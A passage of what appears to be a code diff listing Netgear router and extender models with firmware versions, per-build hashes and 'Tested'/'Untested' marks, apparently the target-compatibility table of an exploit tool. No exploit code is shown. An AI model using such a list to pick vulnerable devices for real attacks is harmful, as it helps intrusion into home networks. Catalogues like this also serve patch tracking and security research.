4e73683b8cfaaadac6b0c9a2b5fe81d1 Untested +# R6400v2 V1.0.2.56_10.0.42 c0bd191a5c021607b9c4627734943cd5 Untested +# R6400v2 V1.0.2.52_1.0.39 73e31c6da5db634d58245169c430ab4e Untested +# R6400v2 V1.0.2.50_1.0.38 d3a9a3d8d1cad0836ceb36c50eda2dbb Untested +# R6400v2 V1.0.2.46_1.0.36 5ac0b9b42dc3be8f1fe67a4ea50d766e Untested +# R6400v2 V1.0.2.44_1.0.35 a29a8290d6f451aa23db9cc132c8bb13 Untested +# R6400v2 V1.0.2.34_1.0.22 d609534b475f848709b5957bf65853d7 Untested +# R6400v2 V1.0.2.32_1.0.20 791b103a3798b00e844007520f0ef10b Untested +# R6400v2 V1.0.2.14_1.0.7 f707aab369ee4a0358084f8732df4427 Untested +# R6700 V1.0.2.8_10.0.53 0aa39d2e46c1597da2ef91894bb016e2 Untested +# R6700 V1.0.2.6_10.0.52 0a9041cc202ca71633f6fd5b15d621ef Untested +# R6700 V1.0.1.48_10.0.46 f9856946d2b2d60ac72149f3db34bd18 Untested +# R6700 V1.0.1.46_10.0.45 60fbfa7d196f3262b1d5c7f2388815fb Untested +# R6700 V1.0.1.44_10.0.44 b034da1c05b9e0e76d980808457b9f7b Untested +# R6700 V1.0.1.36_10.0.40 361b453523cd68d1d50f9be9e6affab4 Untested +# R6700 V1.0.1.32_10.0.38 346a257676872b5322986dd755a26ba0 Untested +# R6700 V1.0.1.26_10.0.35 d868075504004b20d7788c788a5180b2 Untested +# R6700 V1.0.1.22_10.0.33 66bc7b05ac8c546f7f896a9829f01adf Untested +# R6700 V1.0.1.20_10.0.32 43ae34c752dacb9f842947165115568d Untested +# R6700 V1.0.1.16_10.0.30 56e60ce42c6b4eb204e5c192a3cc7021 Untested +# R6700 V1.0.1.14_10.0.29 1f8d3fbcc6e12424692ad371fd895b34 Untested +# R6700 V1.0.0.26_10.0.26 e57c70b7d76855b8df473a8ecc8d4b2c Untested +# R6700 V1.0.0.24_10.0.18 0a63a44df72c4ad9479df8552c9bdf96 Untested +# R6700 V1.0.0.2_1.0.1 9990354d0687c8cde7f42aa025eec7c2 Untested +# R6700v3 V1.0.4.84_10.0.58 25c0a4081adf5ff142074fd0d8014ac7 Untested +# R6700v3 V1.0.4.82_10.0.57 234bdb2fe2d358fa4dbce974ca98d8b0 Untested +# R6700v3 V1.0.4.78_10.0.55 c7dad31adf2562df42d1b020a56ab630 Untested +# R6700v3 V1.0.3.66_10.0.50 585dedb8fa86d0d8f6a4efb5591c501d Untested +# R6700v3 V1.0.2.66_10.0.48 43d36ce5d516a6121adff6aec8f5a7c7 Untested +# R6700v3 V1.0.2.62_10.0.46 11aa8cceef3708d911cb4b2919fe396a Untested +# R6700v3 V1.0.2.60_10.0.44 4e73683b8cfaaadac6b0c9a2b5fe81d1 Untested +# R6700v3 V1.0.2.56_10.0.42 c0bd191a5c021607b9c4627734943cd5 Untested +# R6700v3 V1.0.2.52_1.0.39 73e31c6da5db634d58245169c430ab4e Untested +# R6900 V1.0.2.8_10.0.38 d81bc8a57b9430527fb706d516eed382 Untested +# R6900 V1.0.2.6_10.0.37 b87b38710ef5977179d503bc9bf66c13 Untested +# R6900 V1.0.2.4_10.0.35 9e79f7b6256d96609a7a461829d8248e Untested +# R6900 V1.0.1.48_10.0.30 8784f761ecd1b354649f6cf8c2c5b99f Untested +# R6900 V1.0.1.46_10.0.29 37400b051afec889ab58b056d5bb3c86 Untested +# R6900 V1.0.1.44_10.0.28 9784f4edd86b697c94acde2276179de3 Untested +# R6900 V1.0.1.34_1.0.24 d01623ce7b7493963aa159a60e07fe19 Untested +# R6900 V1.0.1.28_1.0.21 541352d81d7ce6c70707f858e03d3ad3 Untested +# R6900 V1.0.1.26_1.0.20 acbcba2cf243924e324e07b625d8f6b9 Untested +# R6900 V1.0.1.22_1.0.18 01c44643eb33073d5e6ad845227f798a Untested +# R6900 V1.0.1.20_1.0.17 8c26c3b7f0f24f98acda07da2ccad65e Untested +# R6900 V1.0.1.16_1.0.15 7e599f7ebee500d6f085f531a6f1e934 Untested +# R6900 V1.0.1.14_1.0.14 de1af2d6fdc38f2efa7dc19f71110b77 Untested +# R6900 V1.0.0.4_1.0.10 f7cdbfd458403617025681b9fd545df8 Untested +# R6900 V1.0.0.2_1.0.2 4f1253f17d5892a6ad139b17f8122d95 Untested +# R6900P V1.3.1.64_10.1.36 73230b02c8371d16933b86caea3406c8 Untested +# R6900P V1.3.1.44_10.1.23 c94a81a643471975801c1f65f30fa09e Untested +# R6900P V1.3.1.26_10.1.3 350a0ce80d8448f89821c84c5c24e77a Untested +# R6900P V1.3.0.20_10.1.1 57f68b9174f20c1cb9076e893f7c7e3e Untested +# R6900P V1.3.0.8_1.0.93 72df20b0f868e8fb896dc1c89b2f7c9a Untested +# R6900P V1.2.0.22_1.0.78 89b5c3b5f8f75715b01eca80d8423adc Untested +# R6900P V1.0.1.14_1.0.59 8731b6fcf8aa73adec7175c4fa30d623 Untested +# R6900P V1.0.0.58_1.0.50 d04818c010e0bcfeef910cb8c0bd217e Untested +# R6900P V1.0.0.46_1.0.30 d2f1f602054a8475aebd563d9373c59c Untested +# R7000 V1.0.11.100_10.2.100 f39d1a3be29d903a5de78a876a92f247 Tested +# R7000 V1.0.9.88_10.2.88 1e4a56c9fa6a0b1ddb12c93260aa86b9 Tested +# R7000 V1.0.9.64_10.2.64 2545e4d62fe606c9235301b13fe51c4a Tested +# R7000 V1.0.9.60_10.2.60 0c1face67db74dae80477937e375c90f Tested +# R7000 V1.0.9.42_10.2.44 9db15cdabcb182c5a8c352f4d62240aa Tested +# R7000 V1.0.9.34_10.2.36 0130c6ef44df28825c34998ec1ed9d28 Tested +# R7000 V1.0.9.32_10.2.34 d63cc30511ec16eb22aea2ad4536c482 Untested +# R7000 V1.0.9.28_10.2.32 65fdddb6075d231981d0b0b0b173b957 Untested +# R7000 V1.0.9.26_10.2.31 e7eb90b86b4cf80fc498a3a2a1cde4b6 Tested +# R7000 V1.0.9.18_1.2.27 62f58a3b03d2ffe4da6def29dc57fd62 Tested +# R7000 V1.0.9.14_1.2.25 933a68fd113502dbe5ee5eda56d76c4d Tested +# R7000 V1.0.9.12_1.2.23 0815e4c5d8bf72f3bc8f8a7c3c5151a5 Tested +# R7000 V1.0.9.10_1.2.21 89caf1296fb771f6f710fdaa11b1eee4 Tested +# R7000 V1.0.9.6_1.2.19 5f52c024607204abbe68350fe3da9ff0 Tested +# R7000 V1.0.8.34_1.2.15 f9472bcb1eea80197f98bd33006666a3 Tested +# R7000 V1.0.7.12_1.2.5 20358acc1e6eff39e2d6846e76b24cd8 Untested +# R7000 V1.0.7.10_1.2.3 c555f18db9afc19489e7e986f143d485 Untested +# R7000 V1.0.7.6_1.1.99 0a49104751389366034a7c88f32197b3 Untested +# R7000 V1.0.7.2_1.1.93 6d7d94848a91a3e22ff1654411ba09ae Untested +# R7000 V1.0.5.70_1.1.91 05a4bf0348e03857c7d37910f02f4afe Untested +# R7000 V1.0.5.64_1.1.88 edfa804fcb57d842ae1ea53544fc790d Untested +# R7000 V1.0.4.30_1.1.67 c62491d7b5f5ac6a41d4f25d7a4896e2 Untested +# R7000 V1.0.4.28_1.1.64 60f6118cc800e96ec4156738485a6061 Untested +# R7000 V1.0.4.18_1.1.52 ee82a3fcaf278597ebeb6bd6a7a436ec Untested +# R7000 V1.0.3.80_1.1.38 6575261b06aa8a64242f02461530a0fc Untested +# R7000 V1.0.3.68_1.1.31 d62937f144cbe3cc259d33c70adf1f65 Untested +# R7000 V1.0.3.60_1.1.27 f36cf1c461b50883d5c001f66f06c324 Untested +# R7000 V1.0.3.56_1.1.25 2ad107f27a2d3fa6db7787594a5718cd Untested +# R7000 V1.0.3.24_1.1.20 25d86a5a33cd447aa35120e4fc97ae8e Untested +# R7000 V1.0.2.194_1.0.15 26fb65524fec001d6ff8cc723d0e863a Untested +# R7000 V1.0.2.164_1.0.15 b4b75cd7c7fc736ca8d195de6954cdb0 Untested +# R7000 V1.0.1.22_1.0.15 1e7fbdb154328552e6ae21e106b79d71 Untested +# R7000 V1.0.0.96_1.0.15 2e25aedb619a9e5520bf8ea9a25d06ac Untested +# R7000P V1.3.1.64_10.1.36 73230b02c8371d16933b86caea3406c8 Untested +# R7000P V1.3.1.44_10.1.23 c94a81a643471975801c1f65f30fa09e Untested +# R7000P V1.3.1.26_10.1.3 350a0ce80d8448f89821c84c5c24e77a Untested +# R7000P V1.3.0.20_10.1.1 57f68b9174f20c1cb9076e893f7c7e3e Untested +# R7000P V1.3.0.8_1.0.93 72df20b0f868e8fb896dc1c89b2f7c9a Untested +# R7000P V1.2.0.22_1.0.78 89b5c3b5f8f75715b01eca80d8423adc Untested +# R7000P V1.0.1.14_1.0.59 8731b6fcf8aa73adec7175c4fa30d623 Untested +# R7000P V1.0.0.58_1.0.50 d04818c010e0bcfeef910cb8c0bd217e Untested +# R7000P V1.0.0.56_1.0.45 e9350d724b176c752f1854d0c93d6197 Untested +# R7000P V1.0.0.50_1.0.35 02b57178cbc3c931d3f260a544429481 Untested +# R7000P V1.0.0.46_1.0.30 d2f1f602054a8475aebd563d9373c59c Untested +# R7000P V1.0.0.44_1.0.27 fa0eee5e0992621c67e3e2ba5aa00515 Untested +# R7100LG V1.0.0.52_1.0.6 1c8d51be270d926fae37ccb870eb1e1a Untested +# R7100LG V1.0.0.50_1.0.6 1d7ef2375f5d48946c00c256c68d2c7e Untested +# R7100LG V1.0.0.48_1.0.6 114fd13cefdf17588004e13240b8e1bf Untested +# R7100LG V1.0.0.46_1.0.6 f9debfe64d27d0a4e96e7b6a9108363b Untested +# R7100LG V1.0.0.42_1.0.6 dcb553dfd489154862ac74eba99e7497 Untested +# R7100LG V1.0.0.40_1.0.6 6bf2fa0bbd5afd33358cf5753477907b Untested +# R7100LG V1.0.0.38_1.0.6 ee79ad50639af3c4fff83e1638223dff Untested +# R7100LG V1.0.0.36_1.0.6 1c05d9c779fce01aa42859181382340b Untested +# R7100LG V1.0.0.34_1.0.6 45fc097ce307749679c46d77cde5a6aa Untested +# R7100LG V1.0.0.32_1.0.6 b6adb8bc5262870940b410634305d18b Untested +# R7100LG V1.0.0.30_1.0.6 fb13dc96f7513d2eaef39966b0245c7b Untested +# R7100LG V1.0.0.28_1.0.6 11f8dd187ef5b5bab4976d9292d129fc Untested +# R7100LG V1.0.0.24_1.0.6 26732e7cac019aadb0513625017f384a Untested +# R7300 V1.0.0.74_1.0.29 505ed4f38c41eee6d44f7689f50be393 Untested +# R7300 V1.0.0.70_1.0.25 ae3e7269a0b9d57c970341bcb0429542 Untested +# R7300 V1.0.0.68_1.0.24 2bcde5639accf598265b7177d782476d Untested +# R7300 V1.0.0.62_1.0.21 0fe64444a5449fbc047200473f0f9403 Untested +# R7300 V1.0.0.60_1.0.20 13d0cabc4464b992e1df78eef6f3961f Untested +# R7300 V1.0.0.56_1.0.18 ebbbdf612c711973bbf8794c44a95970 Untested +# R7300 V1.0.0.54_1.0.17 5aa834b74be6bf16397c791c80c15146 Untested +# R7300 V1.0.0.52_1.0.16 95419377446f8733fa675c890ec5f894 Untested +# R7300 V1.0.0.46_1.0.13 7628870b9f553a2e10768f69756a581d Untested +# R7300 V1.0.0.44_1.0.12 83b93e33bfc09a30668aa0fdd23e2854 Untested +# R7300 V1.0.0.32_1.0.6 fcef0ba19d673f34ccef4dc91dc4fa05 Untested +# R7300 V1.0.0.26_1.0.6 92cff1f3477af90d8596377839e2eec5 Untested +# R7850 V1.0.5.48_10.0.4 086770d1439357f850a3112ae8819141 Untested +# R7850 V1.0.4.46_10.0.2 0b0d439985567721303ce85429f9f1fb Untested +# R7850 V1.0.4.42_10.0.1 7154f14e8e52992364b9a46454280843 Untested +# R7900 V1.0.4.22_10.0.44 3068215ef9fae0f5b91f423cf298b551 Untested +# R7900 V1.0.3.18_10.0.42 b9648a3331fe0bc714086aa465407027 Untested +# R7900 V1.0.3.10_10.0.38 9f36b5152658c5fab9524a1d5aca196c Untested +# R7900 V1.0.3.8_10.0.37 f7f345699b491db79d7ce2b13c838941 Untested +# R7900 V1.0.2.16_10.0.32 6ea7c6925906967070fbb149a66a4f06 Untested +# R7900 V1.0.2.10_10.0.29 644585c5d3509fe14d52387e1a8bb7c8 Untested +# R7900 V1.0.1.26_10.0.23 2ce02ded670becb1ddf5f23c883d81ee Untested +# R7900 V1.0.1.18_10.0.20 6f9af2c3b682c45793dcf06788603160 Untested +# R7900 V1.0.1.12_10.0.17 44a17c8063f2750fb13bb47bc3cd570c Untested +# R7900 V1.0.1.8_10.0.14 66c1cbf908e9d665ac80aaf2a03c4d8f Untested +# R7900 V1.0.1.4_10.0.12 6d1186a3d281608fc83936e6c5961145 Untested +# R7900 V1.0.0.10_10.0.7 46ec7fc4c5cdb9c093ff3bfdb4c8075d Untested +# R7900 V1.0.0.8_10.0.5 72b987220f836ba90ba96fc8f3c3e6b8 Untested +# R7900 V1.0.0.6_10.0.4 255ef90a187d7faf01afa62aa2e16844 Untested +# R7900 V1.0.0.2_10.0.1 7b6bd468b060ac4fb17084c20898caa4 Untested +# R8000 V1.0.4.46_10.1.63 da80add1588ea779156ec23b58421a0e Untested +# R8000 V1.0.4.28_10.1.54 a93e7d1ca961c5d381c1c93b8f85168b Untested +# R8000 V1.0.4.18_10.1.49 45d86327a2dbbad50f65d04480bb91fd Untested +# R8000 V1.0.4.12_10.1.46 917d43c1bf1805db4d52ed37d360340f Untested +# R8000 V1.0.4.4_1.1.42 bb306a4634a9f38ef6b44bfb699c64d7 Untested +# R8000 V1.0.4.2_1.1.41 a3ec0994398d09e774fa4f149eece45b Untested +# R8000 V1.0.3.54_1.1.37 e2e236432b7e215af3d410d3fd1e3777 Untested +# R8000 V1.0.3.48_1.1.33 8bf3b8f6e1ee371975a1811174a5fe87 Untested +# R8000 V1.0.3.46_1.1.32 9020713be39ebf9c232ffc0efb02c8fe Untested +# R8000 V1.0.3.36_1.1.25 533e646304c2afa4f626f7f4c7aa404c Untested +# R8000 V1.0.3.32_1.1.21 02dcbb51aea55ff912a28a24f6b9f78b Untested +# R8000 V1.0.3.26_1.1.18 e13536f8d86441eae991067c25d8e22f Untested +# R8000 V1.0.3.4_1.1.2 6de885748d6d20f6b5d8fce7112e8563 Untested +# R8000 V1.0.2.46_1.0.97 5b6484ebe4dc70c4f6e3e2068d999efb Untested +# R8000 V1.0.2.44_1.0.96 6f83c53910438a665cb1077dbcd3365e Untested +# R8000 V1.0.1.16_1.0.74 7d670355315b039002a8cbbb80420b4f Untested +# R8000 V1.0.0.110_1.0.70 ef0078e8e19027cdf9ea19de0c933042 Untested +# R8000 V1.0.0.108_1.0.62 6b3476409b804505b6d50ad6bc7b1225 Untested +# R8000 V1.0.0.102_1.0.45 a01fcda6b67f06fe4c8c89beea8a1346 Untested +# R8000 V1.0.0.100_1.0.44 49c84460fe2f2c8acde4c2a5e644b1c8 Untested +# R8000 V1.0.0.90_1.0.39 3f1ec00fbd5b17bb494a7a7b407b0c4e Untested +# R8000 V1.0.0.76_1.0.32 0d13323ba9174c355b892f5fdc8ad1f4 Untested +# R8000 V1.0.0.74_1.0.31 2ba89ed0267f17111410325af7443e9c Untested +# R8000 V1.0.0.68_1.0.27 444b9d3c9f7c4fd57b88adcc204e5786 Untested +# R8000 V1.0.0.46_1.0.17 00a3ca9d640835bc1522bf778316d085 Untested +# R8300 V1.0.2.130_1.0.99 6e66d0f53dabb26b63b3c51c60e31d29 Tested +# R8300 V1.0.2.128_1.0.97 a1976abe6cfe426c82fd3e77910ae833 Tested +# R8300 V1.0.2.122_1.0.94 9158cf385252ea8803c593a61c25d6b4 Untested +# R8300 V1.0.2.116_1.0.90 379b3d60f766f148f6edd781207021a4 Untested +# R8300 V1.0.2.106_1.0.85 e07b4ac548845360376351088bdbe025 Untested +# R8300 V1.0.2.100_1.0.82 aee8499b7a27150255651be82f68d292 Untested +# R8300 V1.0.2.94_1.0.79 bcfbef70672ec7f5eb191eb362d91827 Untested +# R8300 V1.0.2.86_1.0.75 de6b48ac7b27dbe36b3ab787dfda3c69 Untested +# R8300 V1.0.2.80_1.0.71 fc1acfbaeebc1f377b44597371b0d250 Untested +# R8300 V1.0.2.48_1.0.52 e851c828e338b0877257dd1944f48f95 Untested +# R8500 V1.0.2.130_1.0.99 6e66d0f53dabb26b63b3c51c60e31d29 Untested +# R8500 V1.0.2.128_1.0.97 a1976abe6cfe426c82fd3e77910ae833 Untested +# R8500 V1.0.2.122_1.0.94 9158cf385252ea8803c593a61c25d6b4 Untested +# R8500 V1.0.2.116_1.0.90 379b3d60f766f148f6edd781207021a4 Untested +# R8500 V1.0.2.106_1.0.85 e07b4ac548845360376351088bdbe025 Untested +# R8500 V1.0.2.100_1.0.82 aee8499b7a27150255651be82f68d292 Untested +# R8500 V1.0.2.94_1.0.79 bcfbef70672ec7f5eb191eb362d91827 Untested +# R8500 V1.0.2.86_1.0.75 de6b48ac7b27dbe36b3ab787dfda3c69 Untested +# R8500 V1.0.2.80_1.0.71 fc1acfbaeebc1f377b44597371b0d250 Untested +# R8500 V1.0.2.64_1.0.62 5b4523865713dac322bd857130609ad2 Untested +# R8500 V1.0.2.54_1.0.56 24f96de9380f9de69e12f89d4fa75819 Untested +# R8500 V1.0.2.30_1.0.43 86b0d0a568ac5c96a76caff6fd58aa61 Untested +# R8500 V1.0.2.26_1.0.41 db2cb85f4ebe32a00ed0f363857296bc Untested +# R8500 V1.0.0.56_1.0.28 7ce6e1dc960c18753db2d1e485b89b06 Untested +# R8500 V1.0.0.52_1.0.26 3e38a40d46ab92e4051c75485d1905c2 Untested +# R8500 V1.0.0.42_1.0.23 46bede5c9402a454eb1ae575e7a360e4 Untested +# R8500 V1.0.0.28_1.0.15 94090fe2e24ba7306a2f31633adc9fe7 Tested +# RS400 V1.5.0.34_10.0.33 06d0d64069c01a8097cd872749976d05 Untested +# WGR614v8 V1.2.10_21.0.52 614f89302975403d496b4a0b518aea8a Untested +# WGR614v8 V1.2.10_21.0.52NA 101384d94d7952a544fa2e62ca73e109 Untested +# WGR614v8 V1.1.24_14.0.43 f43f802a97701767f8fa09f1eb0618c6 Untested +# WGR614v8 V1.1.24_14.0.43NA 95a6f676f56eac0bb8b1eebbd07218ac Untested +# WGR614v8 V1.1.2_1.0.23 071d4113f52c9b21b3c910bb28bacb7d Untested +# WGR614v8 V1.1.2_1.0.23NA bd2fb25f2771d63615a8f3b97c969a0e Untested +# WGR614v8 V1.1.11_6.0.36 607bb6c99bf0133f0d01fa514801b849 Untested +# WGR614v8 V1.1.11_6.0.36NA 241628d09640f984584744fb017683c3 Untested +# WGR614v8 V1.1.1_1.0.20NA b6eb6eae0124e9cd22d61adcc38c999a Untested +# WGR614v8 V1.1.20_7.0.37 a3c36fcddb7655a94363cc3b7918496a Untested +# WGR614v8 V1.1.20_7.0.37NA ed0152c3f9cb8bd31c9c166e20cafc4b Untested +# WGR614v9 V1.2.32_43.0.46 fa1c55ad1567fd849ef751d291b892de Untested +# WGR614v9 V1.2.32_43.0.46NA 365476604a6a3d41ea175f10c3dde764 Tested +# WGR614v9 V1.2.30_41.0.44 7118b22c86f91adc51bcf1cb1d6adf6c Untested +# WGR614v9 V1.2.30_41.0.44NA 5aa4fb6075c995ac8ed73872785c78ce Untested +# WGR614v9 V1.2.24_37.0.35 5b911dfea21d8db82724810e2a9158bd Untested +# WGR614v9 V1.2.24_37.0.35NA 82e743338a1e9ef765dc4b3e37fafd9d Untested +# WGR614v9 V1.2.6_18.0.17 62d24aa8be617fd336dea0debb655ae1 Untested +# WGR614v9 V1.2.6_18.0.17NA 523084eb4010f48a0e707a4028a1fe1d Untested +# WGR614v9 V1.2.2_14.0.13 e6a2dbc9c94544c7eed21b237ccfd24f Untested +# WGR614v9 V1.2.2_14.0.13NA 2d8d6c91da01e286af941d53b0941cd8 Untested +# WGR614v9 V1.0.18_8.0.9PT 64676efe72f6af307b828271e6204fc2 Untested +# WGR614v9 V1.0.18_8.0.9NA c2ef52172f626dd54516748218fd86fc Untested +# WGR614v9 V1.0.15_4.0.3 77789a77994b2401784b1401d73d0b9d Untested +# WGR614v9 V1.0.15_4.0.3NA 7a8e000d8d49c9e59c4b1679017a34b2 Untested +# WGR614v9 V1.0.9_1.0.1NA f254181ba5f01c3a995d2196ae14ee80 Untested +# WGR614v10 V1.0.2.66_60.0.90 3ba19173b642c36ab3101c2eba76cffe Untested +# WGR614v10 V1.0.2.66_60.0.90NA 0f59b6e38db90d94d2d13b768a3220a9 Tested +# WGR614v10 V1.0.2.60_60.0.85 1d60611c5c1625d080f3e10e610c2d5f Untested +# WGR614v10 V1.0.2.60_60.0.85NA a025c0436b77becfe914b232bf52ef25 Untested +# WGR614v10 V1.0.2.58_60.0.84NA f80a3eb6d9210cb0de2198779f497193 Untested +# WGR614v10 V1.0.2.54_60.0.82 ab7a9cc1b054ab8ca2109437f3496f52 Untested +# WGR614v10 V1.0.2.54_60.0.82NA 2a458ba9762df0e91aeb7c38d3eb7e23 Untested +# WGR614v10 V1.0.2.26_51.0.59 40d158ee9d77db8630f6404e11ae03f9 Untested +# WGR614v10 V1.0.2.26_51.0.59NA 2e31d2fd814b3bdfe3b0e3f20843d1b9 Untested +# WGR614v10 V1.0.2.18_47.0.52 73aab18a9fc0035ff8c65d444cab5549 Untested +# WGR614v10 V1.0.2.18_47.0.52NA d4d624d349e6f7da73043d71f44a57d5 Untested +# WGT624v4 V2.0.13_2.0.15NA 80fefa297112135ddd81cf1f60f3c751 Tested +# WGT624v4 V2.0.13_2.0.14 cb4f0a9fc4135b33a9cf560c95c97f51 Untested +# WGT624v4 V2.0.13_2.0.14NA f5b5be2c84b1aef8ca53df5fceab272e Untested +# WGT624v4 V2.0.12_2.0.12 fed810d3dc976e06588e6876f96f9259 Untested +# WGT624v4 V2.0.12_2.0.12NA 60a3a0f205a5716818dbdf1975fbb07b Tested +# WGT624v4 V2.0.6_2.0.6NA f96fbceb5289a65edd92f978ee706339 Untested +# WN2500RP V1.0.0.30_1.0.58 07465158c20dba3b49c79d2ad1b9c84a Untested +# WN2500RP V1.0.0.26_1.0.54 96bd8cfd11a618e5a55bd022428782c9 Untested +# WN2500RP V1.0.0.24_1.0.53 242e4d920ff5df57c9d65a238c29ce37 Untested +# WN2500RPv2 V1.0.1.54_1.0.68 14b91d65bae2129cc4b899e720e75703 Untested +# WN2500RPv2 V1.0.1.50_1.0.64 8b0791af9666590e58209fd7e5a16b27 Untested +# WN2500RPv2 V1.0.1.46_1.0.60 b5114bc628d4e9edc10196270d583177 Untested +# WN2500RPv2 V1.0.1.42_1.0.56 44a31a9fb0bedf6c005091ad494f5351 Untested +# WN2500RPv2 V1.0.0.30_1.0.41 80ef4b999eca686146b0b04e6d669373 Untested +# WN3000RP V1.0.2.64_1.1.86 cb7f3d886a25dc7eb9f986beb54db84a Tested +# WN3000RP V1.0.1.36_1.1.47 df4292954de76be0f27025b9d13ce6bb Untested +# WN3000RP V1.0.1.34_1.1.46 71f56fc6e8094749302f527fe82289a2 Untested +# WN3000RP V1.0.1.18_1.1.24 a1c3820bdca75d04162dd7861fb2f86d Tested +# WN3000RP V1.0.0.12_1.0.12 e06626090bdae6ce66cf75ff03808a5e Untested +# WN3100RP V1.0.0.20_1.0.22 7fdba1a377186b9e1998672c2648d79d Untested +# WN3100RP V1.0.0.16_1.0.20 35d8cde0380d205a7fdca505667d85b4 Untested +# WN3100RP V1.0.0.14_1.0.19 ae21c356da1b984b489b8aabce19de7b Untested +# WN3100RP V1.0.0.6_1.0.12 f731689ad01cc5505e3891e6919c5a05 Untested +# WN3500RP V1.0.0.22_1.0.62 c1674d36c57a5de7933135d59383974e Untested +# WN3500RP V1.0.0.20_1.0.60 65d7a5a699c75333693b2cd396034937 Untested +# WN3500RP V1.0.0.18_1.0.59 83df1d146445eb58d09e445cb3249894 Untested +# WN3500RP V1.0.0.16_1.0.58 0bbedd6843907c8fbb64770e8b57ac2d Untested +# WN3500RP V1.0.0.14_1.0.54 7cc46c62a531db3dc0fd4780c0f82838 Untested +# WN3500RP V1.0.0.12_1.0.49 d6d3eb3f36fa4c2a041903bf7d6fd169 Untested +# WNCE3001 V1.0.0.50_1.0.35 059ad6dcebb82e6651096da7a08fc78d Untested +# WNCE3001 V1.0.0.46_1.0.33 94f01f14cf494c5149f6d7beaa9296d7 Untested +# WNCE3001 V1.0.0.44_1.0.32 4bbca14fd0f41a8c5cd6871a128e46ac Untested +# WNCE3001 V1.0.0.38 619dc850fe460613aaa2c6df53c419d2 Untested +# WNDR3300 V1.0.45_1.0.45 03d3251057856d6cac4769ab86b066bf Tested +# WNDR3300 V1.0.45_1.0.45NA 5d07e4a0ea0a970e89f9396aa62dd607 Tested +# WNDR3300 V1.0.29_1.0.29 602f96a6fae5e8d7f4309f4d8e08188d Untested +# WNDR3300 V1.0.29_1.0.29NA d6f3cf64ce4af186d4e32b4e6452faf2 Untested +# WNDR3300 V1.0.27_1.0.27NA 8ec2a57bb32cfc0f037972e7e4de7faf Untested +# WNDR3300 V1.0.26_1.0.26 3de6162f831de47f58d9f5333e55b7ab Untested +# WNDR3300 V1.0.26_1.0.26NA 748179fe0a96b58999b3a159c3e31723 Untested +# WNDR3300 V1.0.23_1.0.23NA 3bb5461c1170a5753dfffc3f640acc2b Untested +# WNDR3300 V1.0.14 cf637815959405a86d006e2ba1bcfb8d Untested +# WNDR3300 V1.0.14NA 3d2ac9332328b0c256e3c733c98f6a52 Tested +# WNDR3300v2 V1.0.0.26_11.0.26NA e835e1eee653616ba95499f599b78e5b Untested +# WNDR3400 V1.0.0.52_20.0.60 80de163495cc5e58b2c2ff897eec5fd6 Tested +# WNDR3400 V1.0.0.50_20.0.59 d11430ae71dbae949d2eb2a9630ccf1a Untested +# WNDR3400 V1.0.0.38_16.0.48 b8c40a4c5186a3db9ce2a9099147e693 Tested +# WNDR3400 V1.0.0.34_15.0.42 040b5ffe8176b9c42d96b2099f9b4ce0 Untested +# WNDR3400v2 V1.0.0.54_1.0.82 9c021309e2c4091fc57df0353e75b549 Tested +# WNDR3400v2 V1.0.0.52_1.0.81 727e32bd4cb10e0b24d9766fe9a227df Untested +# WNDR3400v2 V1.0.0.38_1.0.61 c8e6e4c539f61b3e3eb6ca0539a68858 Untested +# WNDR3400v2 V1.0.0.34_1.0.52 a88e95d61d2d7ff00009cb1120e85fe5 Untested +# WNDR3400v2 V1.0.0.16_1.0.34 6e2f0190e121d60c8ff14a3fbe1f13f1 Tested +# WNDR3400v2 V1.0.0.12_1.0.30 b5b34647f8f8d3ba34e7eb5d9c972135 Untested +# WNDR3400v3 V1.0.1.24_1.0.67 2be19432190609d6bfb02d6c1c47ee75 Tested +# WNDR3400v3 V1.0.1.22_1.0.66 c077e49ec59fc692b030198bf495e3ae Untested +# WNDR3400v3 V1.0.1.18_1.0.63 21bf9c98c100bda9f3c1426c0ac08b8e Untested +# WNDR3400v3 V1.0.1.16_1.0.62 c5df186763e4635396ae951b655dd071 Untested +# WNDR3400v3 V1.0.1.14_1.0.61 7e3e4b4e1d52fbcd7d5e5843f09f0a68 Untested +# WNDR3400v3 V1.0.1.12_1.0.58 41ce43703a3ebae82b57b67bb40c5d82 Untested +# WNDR3400v3 V1.0.1.8_1.0.56 4f5b23803637f7217bd04af851956296 Untested +# WNDR3400v3 V1.0.1.4_1.0.52 1ecf5ef5969f669596c25844eef9d493 Untested +# WNDR3400v3 V1.0.1.2_1.0.51 d5e10eb60169468672f64b018b5de076 Untested +# WNDR3400v3 V1.0.0.48_1.0.48 3a34943e3bb1ca6e1aba397b411f4b8e Untested +# WNDR3400v3 V1.0.0.46_1.0.45 eabecab2f26341257506074a68545c2b Untested +# WNDR3400v3 V1.0.0.38_1.0.40 72e5fd96a04f49a20be668bb0c5f0730 Tested +# WNDR3400v3 V1.0.0.22_1.0.29 a04349703393acb4fa8ca8aea84fa623 Untested +# WNDR3400v3 V1.0.0.20_1.0.28 469df29ef44a9df192be7f19d1480330 Untested +# WNDR3700v3 V1.0.0.42_1.0.33 58e4777d185a193780db166db21d5a04 Tested +# WNDR3700v3 V1.0.0.38_1.0.31 7ba5ac026b6f6682dac17a5ce954a96c Tested +# WNDR3700v3 V1.0.0.36_1.0.30 74ee38f55aedd22b1eab1dbf40b11386 Untested +# WNDR3700v3 V1.0.0.30_1.0.27 82441ed888457dcdd73dec464ded0fdc Untested +# WNDR3700v3 V1.0.0.22_1.0.17 82c000f2875fcf4124ec520a49abb16b Untested +# WNDR3700v3 V1.0.0.18_1.0.14 11b537851e5429908b1d6ba720db2869 Tested +# WNDR4000 V1.0.2.10_9.1.89 acecc4d245b1d3ac2a9863a26578f150 Tested +# WNDR4000 V1.0.2.6_9.1.87 fe27305c1bcf41d76ed261aefb28c3bc Untested +# WNDR4000 V1.0.2.4_9.1.86 fd0b612d1d38adb9e06b34f71d32c02f Tested +# WNDR4000 V1.0.2.2_9.1.84 db0094ac915fdc03f939d8e322a90ab7 Untested +# WNDR4000 V1.0.0.94_9.1.81 0f5429b29cd3e891e79674989aec023c Untested +# WNDR4000 V1.0.0.90_9.1.79 3fa15f5a61b941a2c0135af3e515c5e8 Untested +# WNDR4000 V1.0.0.88_9.1.77 7abf69863995397c54b425ca80b30b53 Untested +# WNDR4000 V1.0.0.82_8.0.71 5523a6ff5e7b9e09ce13390c55afe218 Tested +# WNDR4000 V1.0.0.66_8.0.55 36a4947d7073786d72f455d757361db6 Untested +# WNDR4500 V1.0.1.46_1.0.76 84574e9f9fe95c604448052edb4d8d87 Untested +# WNDR4500 V1.0.1.40_1.0.68 dc85b49521a1c363c73bf1ebe8c73ba0 Untested +# WNDR4500 V1.0.1.38_1.0.64 